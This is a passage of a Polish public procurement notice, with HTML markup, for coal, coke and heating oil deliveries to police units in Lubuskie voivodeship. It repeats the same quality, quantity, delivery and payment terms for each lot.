10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KMP ZIELONA GÓRA - WĘGIEL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KPP MIĘDZYRZECZ - WĘGIEL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KPP NOWA SÓL - KOKS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KPP SŁUBICE - WĘGIEL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KPP SULĘCIN - OLEJ OPAŁOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> KPP ŚWIEBODZIN - WĘGIEL I KOKS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> KPP WSCHOWA - OLEJ OPAŁOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> KPP ŻARY - WĘGIEL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> KPP ŻARY - OLEJ OPAŁOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
